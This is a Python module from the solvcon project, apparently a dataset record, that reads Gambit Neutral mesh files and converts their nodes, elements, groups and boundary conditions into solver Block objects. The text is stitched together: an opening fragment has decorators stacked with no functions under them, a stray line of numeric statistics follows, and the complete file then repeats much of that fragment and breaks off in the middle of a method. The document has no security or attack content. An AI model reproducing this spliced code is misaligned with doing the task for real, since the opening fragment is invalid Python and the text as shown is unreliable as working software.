processors['ELEMENT GROUP'] = _element_group
def _boundary_conditions(data, neu):
"""
Take string data for "BOUNDARY CONDITIONS" and parse it to
GambitNeutral object. Set:
- bcs
@param data: sectional data.
@type data: str
@param neu: object to be saved.
@type neu: solvcon.io.gambit.neutral.GambitNetral
@return: nothing
"""
from numpy import fromstring, empty
# discard header.
data = data.split('\n', 1)[-1]
# build group.
neu.bcs.append(BoundaryCondition(data))
processors['BOUNDARY CONDITIONS'] = _boundary_conditions
class GambitNeutralReader(object):
"""
Read and store information of a Gambit Neutral file line by line.
@ivar neuf: source file.
@itype neuf: file
@ivar neu: GambitNeutral object to be saved to.
@itype neu: solvcon.io.gambit.neutral.GambitNeutral
"""
@staticmethod
@staticmethod
@staticmethod
@classmethod
@staticmethod
@staticmethod
def _read_values(neuf, width, nval, dtype):
"""
Read homogeneous values from the current position of the opened
neutral file.
@param neuf: neutral file.
@type neuf: file
@param width: character width per value.
@type width: int
@param nval: number of values to read.
@type nval: int
@param dtype: dtype string to construct ndarray.
@type dtype: str
@return: read array.
@rtype: numpy.ndarray
"""
from numpy import empty
# determine type.
if dtype.startswith('int'):
vtype = int
elif dtype.startswith('float'):
vtype = float
else:
raise TypeError('%s not supported'%dtype)
# allocate array.
arr = empty(nval, dtype=dtype)
# read.
iline = 0
ival = 0
while ival < nval:
line = neuf.readline()
iline += 1
nchar = len(line)
line = line.rstrip()
nc = len(line)
if nc%width != 0:
raise IndexError('not exact chars at line %d'%(ival/iline))
nt = nc//width
arr[ival:ival+nt] = [vtype(line[8*it:8*(it+1)]) for it in range(nt)]
ival += nt
assert ival == nval
return arr
class GambitNeutral(object):
"""
Represent information in a Gambit Neutral file.
@cvar CLTPN_MAP: map cltpn from self to block.
@type CLTPN_MAP: numpy.ndarray
@cvar CLNDS_MAP: map clnds definition from self to block.
@type CLNDS_MAP: dict
@cvar CLFCS_RMAP: map clfcs definition back from block to self.
@type CLFCS_RMAP: dict
@ivar header: file header string.
@type header: str
@ivar title: title for this file.
@type title: str
@ivar data_source: identify the generation of the file from which program
and version.
@type data_source: str
@ivar numnp: number of nodes.
@type numnp: int
@ivar nelem: number of elements.
@type nelem: int
@ivar ngrps: number of element groups.
@type ngrps: int
@ivar nbsets: number of boundary condition sets.
@type nbsets: int
@ivar ndfcd: number of coordinate directions (2/3).
@type ndfcd: int
@ivar ndfvl: number of velocity components (2/3).
@type ndfvl: int
@ivar nodes: nodes array of shape of (numnp, ndfcd).
@type nodes: numpy.ndarray
@ivar elems: elements array of shape of (nelem, :).
@type elems: numpy.ndarray
@ivar grps: list of ElementGroup objects.
@type grps: list
@ivar bcs: list of BoundaryCondition objects.
@type bcs: list
"""
@property
@property
@property
def toblock(self, onlybcnames=None, bcname_mapper=None, fpdtype=None,
use_incenter=False):
"""
Convert GambitNeutral object to Block object.
@keyword onlybcnames: positively list wanted names of BCs.
@type onlybcnames: list
@keyword bcname_mapper: map name to bc type number.
@type bcname_mapper: dict
@keyword fpdtype: floating-point dtype.
@type fpdtype: str
@keyword use_incenter: use incenter when creating block.
@type use_incenter: bool
@return: Block object.
@rtype: solvcon.block.Block
"""
from ..block import Block
# create corresponding block according to GambitNeutral object.
blk = Block(ndim=self.ndim, nnode=self.nnode, ncell=self.ncell,
fpdtype=fpdtype, use_incenter=use_incenter)
self._convert_interior_to(blk)
blk.build_interior()
self._convert_bc_to(blk,
onlynames=onlybcnames, name_mapper=bcname_mapper)
blk.build_boundary()
blk.build_ghost()
return blk
from numpy import array
# define map for cltpn (from self to block).
CLTPN_MAP = array([0, 1, 2, 3, 4, 6, 5, 7], dtype='int32')
# define map for clnds (from self to block).
CLNDS_MAP = {}
# tpn=1: edge.
CLNDS_MAP[1] = {}
CLNDS_MAP[1][2] = [2,3] # 2 nodes.
CLNDS_MAP[1][3] = [2,4] # 3 nodes.
# tpn=2: quadrilateral.
CLNDS_MAP[2] = {}
CLNDS_MAP[2][4] = [2,3,4,5] # 4 nodes.
CLNDS_MAP[2][8] = [2,4,6,8] # 8 nodes.
CLNDS_MAP[2][9] = [2,4,6,8] # 9 nodes.
# tpn=3: triangle.
CLNDS_MAP[3] = {}
CLNDS_MAP[3][3] = [2,3,4] # 3 nodes.
CLNDS_MAP[3][6] = [2,4,6] # 6 nodes.
CLNDS_MAP[3][7] = [2,4,6] # 7 nodes.
# tpn=4: brick.
CLNDS_MAP[4] = {}
CLNDS_MAP[4][8] = [2,3,5,4,6,7,9,8] # 8 nodes.
CLNDS_MAP[4][20] = [2,4,9,7,14,16,21,19] # 20 nodes.
CLNDS_MAP[4][27] = [2,4,10,8,20,22,28,26] # 27 nodes.
# tpn=5: tetrahedron.
CLNDS_MAP[5] = {}
CLNDS_MAP[5][4] = [2,3,4,5] # 4 nodes.
CLNDS_MAP[5][10] = [2,4,7,11] # 10 nodes.
# tpn=6: wedge.
CLNDS_MAP[6] = {}
CLNDS_MAP[6][6] = [2,4,3,5,7,6] # 6 nodes.
CLNDS_MAP[6][15] = [2,7,4,11,16,13] # 15 nodes.
CLNDS_MAP[6][18] = [2,7,4,14,19,16] # 18 nodes.
# tpn=7: pyramid.
CLNDS_MAP[7] = {}
CLNDS_MAP[7][5] = [2,3,5,4,6] # 5 nodes.
CLNDS_MAP[7][13] = [2,4,9,7,14] # 13 nodes.
CLNDS_MAP[7][14] = [2,4,10,8,15] # 14 nodes.
CLNDS_MAP[7][18] = [2,4,10,8,19] # 18 nodes.
CLNDS_MAP[7][19] = [2,4,10,8,20] # 19 nodes.
def _convert_interior_to(self, blk):
"""
Convert interior information, i.e., connectivities, from GambitNeutral
to Block object.
@param blk: to-be-written Block object.
@type blk: solvcon.block.Block
@return: nothing.
"""
from numpy import array
from ..block import elemtype
cltpn_map = self.CLTPN_MAP
clnds_map = self.CLNDS_MAP
# copy nodal coordinate data.
blk.ndcrd[:,:] = self.nodes[:,:]
# copy node difinition in cells.
cltpn = blk.cltpn
clnds = blk.clnds
ncell = self.ncell
icell = 0
while icell < ncell:
# translate tpn from GambitNeutral to Block.
tpn = cltpn_map[self.elems[icell,0]]
cltpn[icell] = tpn
# translate clnds from GambitNeutral to Block.
nnd = elemtype[tpn,2]
nnd_self = self.elems[icell,1]
clnds[icell,0] = nnd
clnds[icell,1:nnd+1] = self.elems[icell,clnds_map[tpn][nnd_self]]
# advance cell.
icell += 1
# create cell groups for the block.
clgrp = blk.clgrp
for grp in self.grps:
igrp = len(blk.grpnames)
assert grp.ngp == igrp+1
clgrp[grp.elems] = igrp
blk.grpnames.append(grp.elmmat)
def _convert_bc_to(self, blk, onlynames=None, name_mapper=None):
"""
Convert boundary condition information from GambitNeutral object into
Block object.
@param blk: to-be-written Block object.
@type blk: solvcon.block.Block
@keyword onlynames: positively list wanted names of BCs.
@type onlynames: list
@keyword name_mapper: map name to bc type and value dictionary; the two
objects are organized in a tuple.
@type name_mapper: dict
@return: nothing.
"""
# process all neutral bc objects.
for neubc in self.bcs:
# extract boundary faces from neutral bc object.
bc = neubc.tobc(blk)
if bc is None: # skip if got nothing.
continue
# skip unwanted BCs.
if onlynames:
if bc.name not in onlynames:
continue
# recreate BC according to name mapping.
if name_mapper is not None:
bct, vdict = name_mapper.get(bc.name, None)
if bct is not None:
bc = bct(bc=bc)
bc.feedValue(vdict)
# save to block object.
bc.sern = len(blk.bclist)
bc.blk = blk
blk.bclist.append(bc)
class NeutralIO(FormatIO):
"""
Proxy to gambit neutral file format.
"""
def load(self, stream, bcrej=None):
"""
Load block from stream with BC mapper applied.
@keyword stream: file object or file name to be read.
@type stream: file or str
@keyword bcrej: names of the BC to reject.
@type bcrej: list
@return: the loaded block.
@rtype: solvcon.block.Block
"""
import gzip
# load gambit neutral file.
if isinstance(stream, (bytes, str)):
if stream.endswith('.gz'):
opener = gzip.open
else:
opener = open
stream = opener(stream)
neu = GambitNeutral(stream)
stream.close()
# convert loaded neutral object into block object.
if bcrej:
onlybcnames = list()
for bc in neu.bcs:
if bc.name not in bcrej:
onlybcnames.append(bc.name)
else:
onlybcnames = None
blk = neu.toblock(onlybcnames=onlybcnames)
return blk
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
fname = sys.argv[1]
neu = GambitNeutral(open(fname).read())
sys.stdout.write("Gambit Neutral object: %s" % neu)
if neu.grps or neu.bcs:
sys.stdout.write(", with:\n")
for lst in neu.grps, neu.bcs:
if len(lst) > 0:
for obj in lst:
sys.stdout.write(" %s\n" % obj)
else:
sys.stdout.write("\n")
else:
sys.stdout.write("usage: %s <file name>\n" % sys.argv[0])
| 34.556346 | 81 | 0.563592 | # -*- coding: UTF-8 -*-
#
# Copyright (c) 2008, Yung-Yu Chen <yyc@solvcon.net>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Gambit Neutral file.
"""
from .core import FormatIO
class ElementGroup(object):
"""
One single element group information in Gambit Neutral file.
@ivar ngp: element group index (1-based).
@type ngp: int
@ivar nelgp: number elements in this group.
@type nelgp: int
@ivar mtyp: material type (0: undefined, 1: conjugate, 2: fluid, 3: porous,
4: solid, 5: deformable).
@type mtyp: int
@ivar nflags: number of solver dependent flags.
@type nflags: int
@ivar solver: array of solver dependent flags of shape of (nflags).
@type solver: numpy.ndarray
@ivar elems: elements array of shape of (nelgp).
@type elems: numpy.ndarray
"""
def __init__(self, data=None):
from numpy import empty
self.ngp = None # retained as 1-based.
self.nelgp = None
self.mtyp = None
self.nflags = None
self.elmmat = ''
self.solver = empty(0)
self.elems = empty(0)
# run parser.
if data != None: self._parse(data)
def __str__(self):
return '[Group #%d(%s): %d elements]' % (
self.ngp, self.elmmat, self.nelgp)
def _parse(self, data):
"""
Parse given string data for element group. Set all instance variables.
@param data: string data for element group.
@type data: string
@return: nothing
"""
from numpy import fromstring
# parse header.
control, enttype, solver, data = data.split('\n', 3)
# parse control.
self.ngp, self.nelgp, self.mtyp, self.nflags = [
int(val) for val in control.split()[1::2]]
# get name.
self.elmmat = enttype.strip()
# get solver flags.
self.solver = fromstring(solver, dtype='int32', sep=' ')
# parse into array and renumber.
self.elems = fromstring(data, dtype='int32', sep=' ')-1
class BoundaryCondition(object):
"""
Hold boundary condition values.
@cvar CLFCS_RMAP: map clfcs definition back from block object to neutral
object.
@type CLFCS_RMAP: dict
@ivar name: name of boundary condition.
@type name: str
@ivar itype: type of data (0: nodal, 1: elemental).
@type itype: int
@ivar nentry: number of entry (nodes or elements/cells).
@type nentry: int
@ivar nvalues: number of values for each data record.
@type nvalues: int
@ivar ibcode: 1D array of boundary condition code.
@type ibcode: numpy.ndarray
@ivar values: array of values attached to each record.
@type values: numpy.ndarray
"""
def __init__(self, data=None):
from numpy import empty
self.name = ''
self.itype = None
self.nentry = None
self.nvalues = None
self.ibcode = empty(0)
self.elems = empty(0)
self.values = empty(0)
# run parser.
if data != None: self._parse(data)
def __str__(self):
return '[BC "%s": %d entries with %d values]' % (
self.name, self.nentry, self.nvalues)
def _parse(self, data):
"""
Parse given data string to boundary condition set. Set all instance
variables.
@param data: string data for boundary condition set.
@type data: str
@return: nothing
"""
from numpy import fromstring
# parse header.
header, data = data.split('\n', 1)
self.name = header[:32].strip()
tokens = fromstring(header[32:], dtype='int32', sep=' ')
self.itype, self.nentry, self.nvalues = tokens[:3]
self.ibcode = tokens[3:].copy()
# parse entries.
if self.itype == 0: # for nodes.
arr = fromstring(data, dtype='int32', sep=' ').reshape(
(self.nentry, self.nvalues+1))
self.elems = (arr[:,0]-1).copy()
arr = fromstring(data, dtype='float64', sep=' ').reshape(
(self.nentry, self.nvalues+1))
self.values = (arr[:,1:]).copy()
elif self.itype == 1: # for elements/cells.
arr = fromstring(data, dtype='int32', sep=' ').reshape(
(self.nentry, self.nvalues+3))
self.elems = arr[:,:3].copy()
self.elems[:,0] -= 1
arr = fromstring(data, dtype='float64', sep=' ').reshape(
(self.nentry, self.nvalues+3))
self.values = (arr[:,3:]).copy()
else:
raise ValueError("itype has to be either 0/1, but get %d" %
self.itype)
# define map for clfcs (from block to neu).
CLFCS_RMAP = {}
# tpn=1: edge.
CLFCS_RMAP[1] = [1,2]
# tpn=2: quadrilateral.
CLFCS_RMAP[2] = [1,2,3,4]
# tpn=3: triangle.
CLFCS_RMAP[3] = [1,2,3]
# tpn=4: hexahedron.
CLFCS_RMAP[4] = [5,2,6,4,1,3]
# tpn=5: tetrahedron.
CLFCS_RMAP[5] = [1,2,4,3]
# tpn=6: prism.
CLFCS_RMAP[6] = [4,5,3,1,2]
# tpn=6: pyramid.
CLFCS_RMAP[7] = [5,2,3,4,1]
def tobc(self, blk):
"""
Extract gambit boundary condition information from self into BC object.
Only process element/cell type of (gambit) boundary condition, and
return None while nodal BCs encountered.
@param blk: Block object for reference, nothing will be altered.
@type blk: solvcon.block.Block
@return: generic BC object.
@rtype: solvcon.boundcond.BC
"""
from numpy import empty
from ..boundcond import BC
clfcs_rmap = self.CLFCS_RMAP
# process only element/cell type of bc.
if self.itype != 1:
return None
# extrace boundary face list.
facn = empty((self.nentry,3), dtype='int32')
facn.fill(-1)
ibnd = 0
for entry in self.elems:
icl, nouse, it = entry[:3]
tpn = blk.cltpn[icl]
facn[ibnd,0] = blk.clfcs[icl, clfcs_rmap[tpn][it-1]]
ibnd += 1
# craft BC object.
bc = BC(fpdtype=blk.fpdtype)
bc.name = self.name
slct = facn[:,0].argsort() # sort face list for bc object.
bc.facn = facn[slct]
bc.value = self.values[slct]
# finish.
return bc
class GambitNeutralParser(object):
"""
Parse and store information of a Gambit Neutral file.
@ivar data: data to be parsed.
@type data: str
@ivar neu: GambitNeutral object to be saved.
@type neu: solvcon.io.gambit.neutral.GambitNeutral
"""
def __init__(self, data, neu):
"""
@param data: data to be parsed.
@type data: str
@param neu: GambitNeutral object to be saved.
@type neu: solvcon.io.gambit.neutral.GambitNeutral
"""
self.data = data
self.neu = neu
def parse(self):
data = self.data
neu = self.neu
sections = data.split('ENDOFSECTION\n')
for section in sections:
header = section.split('\n', 1)[0]
processor = None
for mark in self.processors:
if mark in header:
processor = self.processors[mark]
break
if processor:
processor(section, neu)
processors = {}
def _control_info(data, neu):
"""
Take string data for "CONTROL INFO" and parse it to GambitNeutral
object. Set:
- header
- title
- data_source
- numnp
- nelem
- ngrps
- nbsets
- ndfcd
- ndfvl
@param data: sectional data.
@type data: str
@param neu: object to be saved.
@type neu: solvcon.io.gambit.neutral.GambitNetral
@return: nothing
"""
from numpy import fromstring
data = data.rstrip()
records = data.splitlines()
neu.header = records[1].strip()
neu.title = records[2].strip()
neu.data_source = records[3].strip()
values = fromstring(records[6], dtype='int32', sep=' ')
neu.numnp, neu.nelem, neu.ngrps, \
neu.nbsets, neu.ndfcd, neu.ndfvl = values
processors['CONTROL INFO'] = _control_info
def _nodal_coordinate(data, neu):
"""
Take string data for "NODAL COORDINATES" and parse it to GambitNuetral
object. Set:
- nodes
@param data: sectional data.
@type data: str
@param neu: object to be saved.
@type neu: solvcon.io.gambit.neutral.GambitNetral
@return: nothing
"""
from numpy import fromstring, empty
# discard header.
data = data.split('\n', 1)[-1]
# parse into array and reshape to 2D array.
nodes = fromstring(data, dtype='float64', sep=' ')
nodes = nodes.reshape((neu.numnp, (neu.ndfcd+1)))
# renumber according to first value of each line.
# NOTE: unused number contains garbage.
number = nodes[:,0].astype(int) - 1
newnodes = empty((number.max()+1,neu.ndfcd))
newnodes[number] = nodes[number,1:]
# set result to neu.
neu.nodes = newnodes
processors['NODAL COORDINATE'] = _nodal_coordinate
def _elements_cells(data, neu):
"""
Take string data for "ELEMENTS/CELLS" and parse it to GambitNeutral
object. Set:
- elems
@param data: sectional data.
@type data: str
@param neu: object to be saved.
@type neu: solvcon.io.gambit.neutral.GambitNetral
@return: nothing
"""
from numpy import fromstring, empty
# discard header.
data = data.split('\n', 1)[-1]
# parse into array.
serial = fromstring(data, dtype='int32', sep=' ')
# parse element data -- 1st pass:
# element index, shape, and number of nodes.
meta = empty((neu.nelem, 3), dtype='int32')
ielem = 0
ival = 0
while ielem < neu.nelem:
meta[ielem,:] = serial[ival:ival+3]
ival += 3+meta[ielem,2]
ielem += 1
# parse element data -- 2nd pass:
# node definition.
maxnnode = meta[:,2].max()
elems = empty((neu.nelem, maxnnode+2), dtype='int32')
ielem = 0
ival = 0
while ielem < neu.nelem:
elems[ielem,2:2+meta[ielem,2]] = serial[ival+3:ival+3+meta[ielem,2]]
ival += 3+meta[ielem,2]
ielem += 1
elems[:,:2] = meta[:,1:] # copy the first two columns from meta.
elems[:,2:] -= 1 # renumber node indices in elements.
# set result to neu.
neu.elems = elems
processors['ELEMENTS/CELLS'] = _elements_cells
def _element_group(data, neu):
"""
Take string data for "ELEMENTS GROUP" and parse it to GambitNeutral
object. Set:
- grps
@param data: sectional data.
@type data: str
@param neu: object to be saved.
@type neu: solvcon.io.gambit.neutral.GambitNetral
@return: nothing
"""
from numpy import fromstring, empty
# discard header.
data = data.split('\n', 1)[-1]
# build group.
neu.grps.append(ElementGroup(data))
processors['ELEMENT GROUP'] = _element_group
def _boundary_conditions(data, neu):
"""
Take string data for "BOUNDARY CONDITIONS" and parse it to
GambitNeutral object. Set:
- bcs
@param data: sectional data.
@type data: str
@param neu: object to be saved.
@type neu: solvcon.io.gambit.neutral.GambitNetral
@return: nothing
"""
from numpy import fromstring, empty
# discard header.
data = data.split('\n', 1)[-1]
# build group.
neu.bcs.append(BoundaryCondition(data))
processors['BOUNDARY CONDITIONS'] = _boundary_conditions
class GambitNeutralReader(object):
"""
Read and store information of a Gambit Neutral file line by line.
@ivar neuf: source file.
@itype neuf: file
@ivar neu: GambitNeutral object to be saved to.
@itype neu: solvcon.io.gambit.neutral.GambitNeutral
"""
def __init__(self, neuf, neu):
self.neuf = neuf
self.neu = neu
def read(self):
neuf = self.neuf
neu = self.neu
while True:
toks = neuf.readline()[:20].strip().lower().split()
header = []
for tok in toks:
header.extend(tok.split('/'))
header = '_'.join(header)
method = getattr(self, '_'+header, None)
if method != None:
method(neuf, neu)
assert neuf.readline().strip() == 'ENDOFSECTION'
else:
break
@staticmethod
def _control_info(neuf, neu):
neu.header = neuf.readline().strip()
neu.title = neuf.readline().strip()
neu.data_source = neuf.readline().strip()
for i in range(2): neuf.readline()
line = neuf.readline().rstrip()
neu.numnp = int(line[1:10])
neu.nelem = int(line[11:20])
neu.ngrps = int(line[21:30])
neu.nbsets = int(line[31:40])
neu.ndfcd = int(line[41:50])
neu.ndfvl = int(line[51:60])
@staticmethod
def _nodal_coordinates(neuf, neu):
from numpy import empty
nodes = empty((neu.numnp, neu.ndfcd), dtype='float64')
nodeids = empty(neu.numnp, dtype='int32')
ndim = neu.ndfcd
nnode = neu.numnp
ind = 0
while ind < nnode:
line = neuf.readline()
nodeids[ind] = int(line[:10])
for idm in range(ndim):
nodes[ind,idm] = float(line[10+20*idm:10+20*(idm+1)])
ind += 1
# renumber according to first value of each line.
# NOTE: unused number contains garbage.
nodeids -= 1
neu.nodes = empty((nodeids.max()+1, neu.ndfcd), dtype='float64')
neu.nodes[nodeids] = nodes[nodeids]
@staticmethod
def _elements_cells(neuf, neu):
from numpy import empty
from .. import block
ncell = neu.nelem
elems = empty((ncell, block.UnstructuredBlock.CLMND+2), dtype='int32')
icl = 0
while icl < ncell:
line = neuf.readline()
elems[icl,0] = int(line[9:11])
elems[icl,1] = ncl = int(line[12:14])
for it in range(min(ncl, 7)):
elems[icl,2+it] = int(line[15+8*it:15+8*(it+1)]) - 1
if ncl > 7:
line = neuf.readline()
elems[icl,2+7] = int(line[15:15+8]) - 1
icl += 1
neu.elems = elems
@classmethod
def _element_group(cls, neuf, neu):
emg = ElementGroup()
# group statistics.
line = neuf.readline()
emg.ngp = int(line[7:7+10])
emg.nelgp = int(line[28:28+10])
emg.mtyp = int(line[49:49+10])
emg.nflags = int(line[68:68+10])
# group name.
line = neuf.readline()
emg.elmmat = line.strip()
# solver data.
emg.solver = cls._read_values(neuf, 8, emg.nflags, 'int32')
# element data.
emg.elems = cls._read_values(neuf, 8, emg.nelgp, 'int32')-1
# append group.
neu.grps.append(emg)
@staticmethod
def _boundary_conditions(neuf, neu):
from numpy import empty
bc = BoundaryCondition()
# control record.
line = neuf.readline()
bc.name = line[:32].strip()
bc.itype = int(line[32:32+10])
bc.nentry = nbfc = int(line[42:42+10])
bc.nvalues = nval = int(line[52:52+10])
if bc.itype == 0: # nodes.
bc.elems = elems = empty(nbfc, dtype='int32')
bc.values = values = empty((nbfc, nval), dtype='float64')
ibfc = 0
while ibfc < nbfc:
line = neuf.readline()
elems[ibfc] = int(line[0:10])
values[ibfc] = [float(line[10+20*it:10+20*(it+1)]) for it in
range(nval)]
ibfc += 1
elif bc.itype == 1: # elements/cells.
bc.elems = elems = empty((nbfc, 3), dtype='int32')
bc.values = values = empty((nbfc, nval), dtype='float64')
ibfc = 0
while ibfc < nbfc:
line = neuf.readline()
elems[ibfc] = (int(line[0:10])-1,
int(line[10:15]), int(line[15:20]))
values[ibfc] = [float(line[20+20*it:20+20*(it+1)]) for it in
range(nval)]
ibfc += 1
else:
raise ValueError('only 0/1 of itype is allowed')
assert ibfc == nbfc
# append.
neu.bcs.append(bc)
@staticmethod
def _read_values(neuf, width, nval, dtype):
"""
Read homogeneous values from the current position of the opened
neutral file.
@param neuf: neutral file.
@type neuf: file
@param width: character width per value.
@type width: int
@param nval: number of values to read.
@type nval: int
@param dtype: dtype string to construct ndarray.
@type dtype: str
@return: read array.
@rtype: numpy.ndarray
"""
from numpy import empty
# determine type.
if dtype.startswith('int'):
vtype = int
elif dtype.startswith('float'):
vtype = float
else:
raise TypeError('%s not supported'%dtype)
# allocate array.
arr = empty(nval, dtype=dtype)
# read.
iline = 0
ival = 0
while ival < nval:
line = neuf.readline()
iline += 1
nchar = len(line)
line = line.rstrip()
nc = len(line)
if nc%width != 0:
raise IndexError('not exact chars at line %d'%(ival/iline))
nt = nc//width
arr[ival:ival+nt] = [vtype(line[8*it:8*(it+1)]) for it in range(nt)]
ival += nt
assert ival == nval
return arr
class GambitNeutral(object):
"""
Represent information in a Gambit Neutral file.
@cvar CLTPN_MAP: map cltpn from self to block.
@type CLTPN_MAP: numpy.ndarray
@cvar CLNDS_MAP: map clnds definition from self to block.
@type CLNDS_MAP: dict
@cvar CLFCS_RMAP: map clfcs definition back from block to self.
@type CLFCS_RMAP: dict
@ivar header: file header string.
@type header: str
@ivar title: title for this file.
@type title: str
@ivar data_source: identify the generation of the file from which program
and version.
@type data_source: str
@ivar numnp: number of nodes.
@type numnp: int
@ivar nelem: number of elements.
@type nelem: int
@ivar ngrps: number of element groups.
@type ngrps: int
@ivar nbsets: number of boundary condition sets.
@type nbsets: int
@ivar ndfcd: number of coordinate directions (2/3).
@type ndfcd: int
@ivar ndfvl: number of velocity components (2/3).
@type ndfvl: int
@ivar nodes: nodes array of shape of (numnp, ndfcd).
@type nodes: numpy.ndarray
@ivar elems: elements array of shape of (nelem, :).
@type elems: numpy.ndarray
@ivar grps: list of ElementGroup objects.
@type grps: list
@ivar bcs: list of BoundaryCondition objects.
@type bcs: list
"""
def __init__(self, data):
from numpy import empty
# control info.
self.header = ''
self.title = ''
self.data_source = ''
self.numnp = None
self.nelem = None
self.ngrps = None
self.nbsets = None
self.ndfcd = None
self.ndfvl = None
# node info.
self.nodes = empty(0)
# element/cell info.
self.elems = empty(0)
# element group info.
self.grps = []
# boundary conditions info.
self.bcs = []
# parse/read.
if hasattr(data, 'read'):
GambitNeutralReader(data, self).read()
else:
GambitNeutralParser(data, self).parse()
def __str__(self):
return '[Neutral (%s): %d nodes, %d elements, %d groups, %d bcs]' % (
self.title, self.numnp, self.nelem, len(self.grps), len(self.bcs))
@property
def ndim(self):
return self.ndfcd
@property
def nnode(self):
return self.nodes.shape[0]
@property
def ncell(self):
return self.elems.shape[0]
def toblock(self, onlybcnames=None, bcname_mapper=None, fpdtype=None,
use_incenter=False):
"""
Convert GambitNeutral object to Block object.
@keyword onlybcnames: positively list wanted names of BCs.
@type onlybcnames: list
@keyword bcname_mapper: map name to bc type number.
@type bcname_mapper: dict
@keyword fpdtype: floating-point dtype.
@type fpdtype: str
@keyword use_incenter: use incenter when creating block.
@type use_incenter: bool
@return: Block object.
@rtype: solvcon.block.Block
"""
from ..block import Block
# create corresponding block according to GambitNeutral object.
blk = Block(ndim=self.ndim, nnode=self.nnode, ncell=self.ncell,
fpdtype=fpdtype, use_incenter=use_incenter)
self._convert_interior_to(blk)
blk.build_interior()
self._convert_bc_to(blk,
onlynames=onlybcnames, name_mapper=bcname_mapper)
blk.build_boundary()
blk.build_ghost()
return blk
from numpy import array
# define map for cltpn (from self to block).
CLTPN_MAP = array([0, 1, 2, 3, 4, 6, 5, 7], dtype='int32')
# define map for clnds (from self to block).
CLNDS_MAP = {}
# tpn=1: edge.
CLNDS_MAP[1] = {}
CLNDS_MAP[1][2] = [2,3] # 2 nodes.
CLNDS_MAP[1][3] = [2,4] # 3 nodes.
# tpn=2: quadrilateral.
CLNDS_MAP[2] = {}
CLNDS_MAP[2][4] = [2,3,4,5] # 4 nodes.
CLNDS_MAP[2][8] = [2,4,6,8] # 8 nodes.
CLNDS_MAP[2][9] = [2,4,6,8] # 9 nodes.
# tpn=3: triangle.
CLNDS_MAP[3] = {}
CLNDS_MAP[3][3] = [2,3,4] # 3 nodes.
CLNDS_MAP[3][6] = [2,4,6] # 6 nodes.
CLNDS_MAP[3][7] = [2,4,6] # 7 nodes.
# tpn=4: brick.
CLNDS_MAP[4] = {}
CLNDS_MAP[4][8] = [2,3,5,4,6,7,9,8] # 8 nodes.
CLNDS_MAP[4][20] = [2,4,9,7,14,16,21,19] # 20 nodes.
CLNDS_MAP[4][27] = [2,4,10,8,20,22,28,26] # 27 nodes.
# tpn=5: tetrahedron.
CLNDS_MAP[5] = {}
CLNDS_MAP[5][4] = [2,3,4,5] # 4 nodes.
CLNDS_MAP[5][10] = [2,4,7,11] # 10 nodes.
# tpn=6: wedge.
CLNDS_MAP[6] = {}
CLNDS_MAP[6][6] = [2,4,3,5,7,6] # 6 nodes.
CLNDS_MAP[6][15] = [2,7,4,11,16,13] # 15 nodes.
CLNDS_MAP[6][18] = [2,7,4,14,19,16] # 18 nodes.
# tpn=7: pyramid.
CLNDS_MAP[7] = {}
CLNDS_MAP[7][5] = [2,3,5,4,6] # 5 nodes.
CLNDS_MAP[7][13] = [2,4,9,7,14] # 13 nodes.
CLNDS_MAP[7][14] = [2,4,10,8,15] # 14 nodes.
CLNDS_MAP[7][18] = [2,4,10,8,19] # 18 nodes.
CLNDS_MAP[7][19] = [2,4,10,8,20] # 19 nodes.
def _convert_interior_to(self, blk):
"""
Convert interior information, i.e., connectivities, from GambitNeutral
to Block object.
@param blk: to-be-written Block object.
@type blk: solvcon.block.Block
@return: nothing.
"""
from numpy import array
from ..block import elemtype
cltpn_map = self.CLTPN_MAP
clnds_map = self.CLNDS_MAP
# copy nodal coordinate data.
blk.ndcrd[:,:] = self.nodes[:,:]
# copy node difinition in cells.
cltpn = blk.cltpn
clnds = blk.clnds
ncell = self.ncell
icell = 0
while icell < ncell:
# translate tpn from GambitNeutral to Block.
tpn = cltpn_map[self.elems[icell,0]]
cltpn[icell] = tpn
# translate clnds from GambitNeutral to Block.
nnd = elemtype[tpn,2]
nnd_self = self.elems[icell,1]
clnds[icell,0] = nnd
clnds[icell,1:nnd+1] = self.elems[icell,clnds_map[tpn][nnd_self]]
# advance cell.
icell += 1
# create cell groups for the block.
clgrp = blk.clgrp
for grp in self.grps:
igrp = len(blk.grpnames)
assert grp.ngp == igrp+1
clgrp[grp.elems] = igrp
blk.grpnames.append(grp.elmmat)
def _convert_bc_to(self, blk, onlynames=None, name_mapper=None):
"""
Convert boundary condition information from GambitNeutral object into
Block object.
@param blk: to-be-written Block object.
@type blk: solvcon.block.Block
@keyword onlynames: positively list wanted names of BCs.
@type onlynames: list
@keyword name_mapper: map name to bc type and value dictionary; the two
objects are organized in a tuple.
@type name_mapper: dict
@return: nothing.
"""
# process all neutral bc objects.
for neubc in self.bcs:
# extract boundary faces from neutral bc object.
bc = neubc.tobc(blk)
if bc is None: # skip if got nothing.
continue
# skip unwanted BCs.
if onlynames:
if bc.name not in onlynames:
continue
# recreate BC according to name mapping.
if name_mapper is not None:
bct, vdict = name_mapper.get(bc.name, None)
if bct is not None:
bc = bct(bc=bc)
